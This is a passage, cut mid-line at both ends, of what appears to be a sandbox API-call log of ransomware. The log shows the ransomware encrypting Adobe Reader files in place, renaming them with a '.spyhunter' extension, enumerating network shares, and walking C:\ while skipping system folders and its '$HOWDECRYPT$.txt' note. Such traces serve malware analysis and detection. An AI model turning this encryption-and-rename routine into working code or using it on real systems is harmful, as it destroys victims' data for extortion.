(x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CORPCHAR.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\corpchar.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CORPCHAR.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\corpchar.txt.spyhunter")) returned 1 [0180.216] GetProcessHeap () returned 0x2c0000 [0180.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.216] GetProcessHeap () returned 0x2c0000 [0180.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0180.216] GetProcessHeap () returned 0x2c0000 [0180.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee1fd8 | out: hHeap=0x2c0000) returned 1 [0180.217] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3a8 | out: pbBuffer=0x270e3a8) returned 1 [0180.217] GetProcessHeap () returned 0x2c0000 [0180.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0180.217] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3a0*=0x30) returned 1 [0180.217] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINTRAD.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\chintrad.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.218] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINTRAD.TXT") returned 99 [0180.218] StrStrW (lpFirst="CHINTRAD.TXT", lpSrch=".txt") returned 0x0 [0180.218] GetProcessHeap () returned 0x2c0000 [0180.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0180.218] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e364, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e364*=0x2800, lpOverlapped=0x0) returned 1 [0180.348] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.349] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e364, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e364*=0x2800, lpOverlapped=0x0) returned 1 [0180.349] GetProcessHeap () returned 0x2c0000 [0180.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0180.349] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.349] WriteFile (in: hFile=0x9c, lpBuffer=0x270e3a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e364, lpOverlapped=0x0 | out: lpBuffer=0x270e3a4*, lpNumberOfBytesWritten=0x270e364*=0x4, lpOverlapped=0x0) returned 1 [0180.438] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e364, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e364*=0x30, lpOverlapped=0x0) returned 1 [0180.438] CloseHandle (hObject=0x9c) returned 1 [0180.438] GetProcessHeap () returned 0x2c0000 [0180.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.438] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINTRAD.TXT.spyhunter") returned 109 [0180.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINTRAD.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\chintrad.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINTRAD.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\chintrad.txt.spyhunter")) returned 1 [0180.439] GetProcessHeap () returned 0x2c0000 [0180.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.439] GetProcessHeap () returned 0x2c0000 [0180.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0180.440] GetProcessHeap () returned 0x2c0000 [0180.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee1ec0 | out: hHeap=0x2c0000) returned 1 [0180.440] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3a8 | out: pbBuffer=0x270e3a8) returned 1 [0180.440] GetProcessHeap () returned 0x2c0000 [0180.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0180.440] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3a0*=0x30) returned 1 [0180.440] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa03.ths"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.441] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.ths") returned 101 [0180.441] StrStrW (lpFirst="usa03.ths", lpSrch=".txt") returned 0x0 [0180.441] GetProcessHeap () returned 0x2c0000 [0180.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0180.441] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e364, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e364*=0x2800, lpOverlapped=0x0) returned 1 [0180.449] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.449] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e364, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e364*=0x2800, lpOverlapped=0x0) returned 1 [0180.449] GetProcessHeap () returned 0x2c0000 [0180.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0180.449] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.449] WriteFile (in: hFile=0x9c, lpBuffer=0x270e3a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e364, lpOverlapped=0x0 | out: lpBuffer=0x270e3a4*, lpNumberOfBytesWritten=0x270e364*=0x4, lpOverlapped=0x0) returned 1 [0180.499] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e364, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e364*=0x30, lpOverlapped=0x0) returned 1 [0180.499] CloseHandle (hObject=0x9c) returned 1 [0180.499] GetProcessHeap () returned 0x2c0000 [0180.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.499] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.ths.spyhunter") returned 111 [0180.500] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa03.ths"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.ths.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa03.ths.spyhunter")) returned 1 [0180.501] GetProcessHeap () returned 0x2c0000 [0180.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.501] GetProcessHeap () returned 0x2c0000 [0180.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0180.501] GetProcessHeap () returned 0x2c0000 [0180.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee1270 | out: hHeap=0x2c0000) returned 1 [0180.501] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3a0 | out: pbBuffer=0x270e3a0) returned 1 [0180.501] GetProcessHeap () returned 0x2c0000 [0180.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0180.501] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e398*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e398*=0x30) returned 1 [0180.501] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.503] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa.fca") returned 99 [0180.503] StrStrW (lpFirst="usa.fca", lpSrch=".txt") returned 0x0 [0180.503] GetProcessHeap () returned 0x2c0000 [0180.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0180.503] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e35c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e35c*=0x123c, lpOverlapped=0x0) returned 1 [0180.699] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffedc4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.699] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x123c, lpNumberOfBytesWritten=0x270e35c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e35c*=0x123c, lpOverlapped=0x0) returned 1 [0180.699] GetProcessHeap () returned 0x2c0000 [0180.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0180.699] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.699] WriteFile (in: hFile=0x9c, lpBuffer=0x270e39c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e35c, lpOverlapped=0x0 | out: lpBuffer=0x270e39c*, lpNumberOfBytesWritten=0x270e35c*=0x4, lpOverlapped=0x0) returned 1 [0180.699] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e35c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e35c*=0x30, lpOverlapped=0x0) returned 1 [0180.699] CloseHandle (hObject=0x9c) returned 1 [0180.699] GetProcessHeap () returned 0x2c0000 [0180.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.699] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa.fca.spyhunter") returned 109 [0180.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa.fca"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa.fca.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa.fca.spyhunter")) returned 1 [0180.701] GetProcessHeap () returned 0x2c0000 [0180.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.701] GetProcessHeap () returned 0x2c0000 [0180.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0180.701] GetProcessHeap () returned 0x2c0000 [0180.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee1040 | out: hHeap=0x2c0000) returned 1 [0180.701] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3a0 | out: pbBuffer=0x270e3a0) returned 1 [0180.701] GetProcessHeap () returned 0x2c0000 [0180.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0180.701] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e398*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e398*=0x30) returned 1 [0180.701] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd43.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd43.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.703] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd43.hsp") returned 101 [0180.703] StrStrW (lpFirst="swd43.hsp", lpSrch=".txt") returned 0x0 [0180.703] GetProcessHeap () returned 0x2c0000 [0180.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0180.703] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e35c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e35c*=0x2800, lpOverlapped=0x0) returned 1 [0180.782] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.782] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e35c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e35c*=0x2800, lpOverlapped=0x0) returned 1 [0180.782] GetProcessHeap () returned 0x2c0000 [0180.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0180.782] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.782] WriteFile (hFile=0x9c, lpBuffer=0x270e39c, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e35c, lpOverlapped=0x0) Thread: id = 9 os_tid = 0xacc [0078.045] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x0, lphEnum=0x284ff84 | out: lphEnum=0x284ff84*=0x335e20) returned 0x0 [0081.876] GetProcessHeap () returned 0x2c0000 [0081.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x4040) returned 0x337f08 [0081.877] WNetEnumResourceW (in: hEnum=0x335e20, lpcCount=0x284ff7c, lpBuffer=0x337f08, lpBufferSize=0x284ff80 | out: lpcCount=0x284ff7c, lpBuffer=0x337f08, lpBufferSize=0x284ff80) returned 0x0 [0081.877] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x337f08, lphEnum=0x284ff5c | out: lphEnum=0x284ff5c*=0x3256b0) returned 0x0 [0081.893] GetProcessHeap () returned 0x2c0000 [0081.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x4040) returned 0x33cfe8 [0081.894] WNetEnumResourceW (in: hEnum=0x3256b0, lpcCount=0x284ff54, lpBuffer=0x33cfe8, lpBufferSize=0x284ff58 | out: lpcCount=0x284ff54, lpBuffer=0x33cfe8, lpBufferSize=0x284ff58) returned 0x103 [0081.894] GetProcessHeap () returned 0x2c0000 [0081.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33cfe8 | out: hHeap=0x2c0000) returned 1 [0081.894] WNetCloseEnum (hEnum=0x3256b0) returned 0x0 [0081.894] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x337f28, lphEnum=0x284ff5c | out: lphEnum=0x284ff5c*=0x3256b0) returned 0x4b8 [0100.007] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x337f48, lphEnum=0x284ff5c | out: lphEnum=0x284ff5c*=0x3256b0) returned 0x4c6 [0100.009] WNetEnumResourceW (in: hEnum=0x335e20, lpcCount=0x284ff7c, lpBuffer=0x337f08, lpBufferSize=0x284ff80 | out: lpcCount=0x284ff7c, lpBuffer=0x337f08, lpBufferSize=0x284ff80) returned 0x103 [0100.009] GetProcessHeap () returned 0x2c0000 [0100.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x337f08 | out: hHeap=0x2c0000) returned 1 [0100.009] WNetCloseEnum (hEnum=0x335e20) returned 0x0 Thread: id = 10 os_tid = 0xad0 [0080.310] GetProcessHeap () returned 0x2c0000 [0080.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2d8e40 [0080.311] wnsprintfW (in: pszDest=0x2d8e40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\*") returned 8 [0080.311] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x298fd38 | out: lpFindFileData=0x298fd38) returned 0x2d81a8 [0080.311] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Windows") returned -1 [0080.311] lstrlenW (lpString="Windows") returned 7 [0080.311] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="$Recycle.bin") returned 0 [0080.311] FindNextFileW (in: hFindFile=0x2d81a8, lpFindFileData=0x298fd38 | out: lpFindFileData=0x298fd38) returned 1 [0080.311] lstrcmpiW (lpString1="Boot", lpString2="Windows") returned -1 [0080.311] lstrlenW (lpString="Windows") returned 7 [0080.311] lstrcmpiW (lpString1="Boot", lpString2="$Recycle.bin") returned 1 [0080.311] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.311] lstrcmpiW (lpString1="Boot", lpString2="System Volume Information") returned -1 [0080.311] lstrlenW (lpString="System Volume Information") returned 25 [0080.311] wnsprintfW (in: pszDest=0x2d8e40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot") returned 11 [0080.311] lstrcmpW (lpString1="Boot", lpString2=".") returned 1 [0080.311] lstrcmpW (lpString1="Boot", lpString2="..") returned 1 [0080.311] GetProcessHeap () returned 0x2c0000 [0080.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e9e90 [0080.312] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\*") returned 13 [0080.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 0x2d84e8 [0080.312] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.312] lstrlenW (lpString="Windows") returned 7 [0080.312] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.312] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.312] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.312] lstrlenW (lpString="System Volume Information") returned 25 [0080.312] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\.") returned 13 [0080.312] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.312] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0080.312] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.312] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0080.312] lstrlenW (lpString="\\\\?\\C:\\Boot\\.") returned 13 [0080.312] GetProcessHeap () returned 0x2c0000 [0080.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x5c) returned 0x2f9ed8 [0080.313] GetProcessHeap () returned 0x2c0000 [0080.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x48) returned 0x2f9f40 [0080.313] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.313] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.313] lstrlenW (lpString="Windows") returned 7 [0080.313] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.313] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.313] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.313] lstrlenW (lpString="System Volume Information") returned 25 [0080.313] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\..") returned 14 [0080.313] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.313] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.314] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0080.314] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.314] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0080.314] lstrlenW (lpString="\\\\?\\C:\\Boot\\..") returned 14 [0080.314] GetProcessHeap () returned 0x2c0000 [0080.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x5e) returned 0x2faf98 [0080.314] GetProcessHeap () returned 0x2c0000 [0080.314] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2f9f40, Size=0x10) returned 0x2f9f40 [0080.314] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.314] lstrcmpiW (lpString1="BCD", lpString2="Windows") returned -1 [0080.314] lstrlenW (lpString="Windows") returned 7 [0080.314] lstrcmpiW (lpString1="BCD", lpString2="$Recycle.bin") returned 1 [0080.314] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.314] lstrcmpiW (lpString1="BCD", lpString2="System Volume Information") returned -1 [0080.314] lstrlenW (lpString="System Volume Information") returned 25 [0080.314] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD") returned 15 [0080.314] StrStrIW (lpFirst="BCD", lpSrch=".spyhunter") returned 0x0 [0080.314] lstrcmpW (lpString1="BCD", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.314] lstrcmpW (lpString1="BCD", lpString2="_uninstalling_.png") returned 1 [0080.314] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD") returned 15 [0080.314] GetProcessHeap () returned 0x2c0000 [0080.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x60) returned 0x2fb000 [0080.314] GetProcessHeap () returned 0x2c0000 [0080.314] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2f9f40, Size=0x18) returned 0x2f9f40 [0080.314] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.314] lstrcmpiW (lpString1="BCD.LOG", lpString2="Windows") returned -1 [0080.314] lstrlenW (lpString="Windows") returned 7 [0080.314] lstrcmpiW (lpString1="BCD.LOG", lpString2="$Recycle.bin") returned 1 [0080.314] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.314] lstrcmpiW (lpString1="BCD.LOG", lpString2="System Volume Information") returned -1 [0080.314] lstrlenW (lpString="System Volume Information") returned 25 [0080.314] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG") returned 19 [0080.314] StrStrIW (lpFirst="BCD.LOG", lpSrch=".spyhunter") returned 0x0 [0080.314] lstrcmpW (lpString1="BCD.LOG", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.314] lstrcmpW (lpString1="BCD.LOG", lpString2="_uninstalling_.png") returned 1 [0080.314] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG") returned 19 [0080.314] GetProcessHeap () returned 0x2c0000 [0080.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x68) returned 0x2fb068 [0080.314] GetProcessHeap () returned 0x2c0000 [0080.314] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2f9f40, Size=0x20) returned 0x2f9f40 [0080.315] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.315] lstrcmpiW (lpString1="BCD.LOG1", lpString2="Windows") returned -1 [0080.315] lstrlenW (lpString="Windows") returned 7 [0080.315] lstrcmpiW (lpString1="BCD.LOG1", lpString2="$Recycle.bin") returned 1 [0080.315] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.315] lstrcmpiW (lpString1="BCD.LOG1", lpString2="System Volume Information") returned -1 [0080.315] lstrlenW (lpString="System Volume Information") returned 25 [0080.315] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, 